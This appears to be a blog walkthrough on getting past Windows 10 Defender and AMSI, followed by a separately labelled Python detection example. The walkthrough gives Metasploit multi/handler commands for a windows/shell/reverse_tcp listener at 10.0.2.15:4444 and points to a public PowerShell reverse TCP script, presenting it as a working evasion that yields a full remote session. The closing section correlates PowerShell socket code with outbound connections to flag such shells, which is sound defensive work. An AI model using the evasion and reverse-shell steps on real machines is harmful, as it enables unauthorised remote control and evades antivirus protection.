Defeat Windows 10 with Defender AMSI

Most of the standard off-the-shelf packages that generate payloads on Kali Linux are useless against the latest Windows 10 Defender (as of writing it is December 2020). I was able to generate payloads that could get around the virus checks, but the problem is when executing them: Windows AMSI (Antimalware Scan Interface) will recognize and kill the file.

After a lot of hunting around I found this:

https://github.com/ivan-sincek/powershell-reverse-tcp

This is a collection of PowerShell scripts that will open a reverse_tcp connection. So far it's the only thing I have managed to make work against the latest Windows 10 Defender, and it defeats AMSI.

So go ahead and start up Metasploit on your Linux machine:

$ msfconsole

and then we will use the multi/handler module with a Windows shell payload:

msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp

and set the LHOST and LPORT parameters before starting the listener:

msf6 exploit(multi/handler) > set LHOST 10.0.2.15
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

Now we will go to our Windows machine and run one of the scripts from Ivan Sincek's repository, powershell_reverse_tcp.ps1.

[Image: PowerShell reverse TCP script from Ivan Sincek]

You will see that it runs successfully without any warnings despite Windows Defender being turned on.

[Image: PowerShell successfully bypassing Windows 10 Defender]

On our Linux machine we now have a full PowerShell session.

[Image: Kali Linux PowerShell session in Metasploit]

The script from Ivan is really excellent. After many hours of trying lots of different payloads, editing payloads and so on, this was the best result I got, and it's just an "off the shelf" solution!
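Since the script gets past AMSI's content scan rather than hiding what it does, what a defender still has is the behaviour: a powershell.exe process whose script block opens a raw TCP client and which then makes an outbound connection to the listener (here 10.0.2.15:4444). The following is an added detection example, not code from this post or from Ivan Sincek's repository; it correlates simplified, constructed records modelled on Sysmon Event ID 3 (network connection) and PowerShell Event ID 4104 (script block logging) by process id, and the field names are an assumption of this example rather than the real event schema.

```python
import re

# Constructed sample events (not real logs): a simplified mix of Sysmon Event ID 3
# (network connection) and PowerShell Event ID 4104 (script block logging) records.
SAMPLE_EVENTS = [
    {"id": 4104, "pid": 4120,
     "script": "$client = New-Object System.Net.Sockets.TCPClient('10.0.2.15', 4444); "
               "$stream = $client.GetStream()"},
    {"id": 3, "pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst_ip": "10.0.2.15", "dst_port": 4444},
    {"id": 3, "pid": 5544,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
    {"id": 3, "pid": 6001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst_ip": "10.0.2.20", "dst_port": 443},
]

# Behavioural markers of a PowerShell reverse TCP shell: the script block creates a
# raw TCP client and reads/writes its stream, and the same process connects outbound.
SOCKET_PATTERN = re.compile(r"System\.Net\.Sockets\.TCPClient|\.GetStream\(\)", re.IGNORECASE)
WEB_PORTS = {80, 443}


def find_reverse_shell_candidates(events):
    """Correlate 4104 script blocks with Sysmon 3 connections by PID.

    Returns a list of (pid, dst_ip, dst_port, reason) tuples, strongest signal first
    for each process: socket code plus a connection beats a bare non-web connection.
    """
    socket_pids = {e["pid"] for e in events
                   if e["id"] == 4104 and SOCKET_PATTERN.search(e["script"])}
    hits = []
    for e in events:
        if e["id"] != 3 or not e["image"].lower().endswith("powershell.exe"):
            continue
        if e["pid"] in socket_pids:
            hits.append((e["pid"], e["dst_ip"], e["dst_port"],
                         "TCP client code in script block followed by outbound connection"))
        elif e["dst_port"] not in WEB_PORTS:
            hits.append((e["pid"], e["dst_ip"], e["dst_port"],
                         "powershell.exe outbound connection to non-web port"))
    return hits


if __name__ == "__main__":
    for hit in find_reverse_shell_candidates(SAMPLE_EVENTS):
        print("ALERT pid=%d -> %s:%d (%s)" % hit)
```

On the constructed sample only the process that both ran the socket code and connected to 10.0.2.15:4444 is flagged; the Firefox connection and the PowerShell HTTPS connection with no socket code are left alone.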
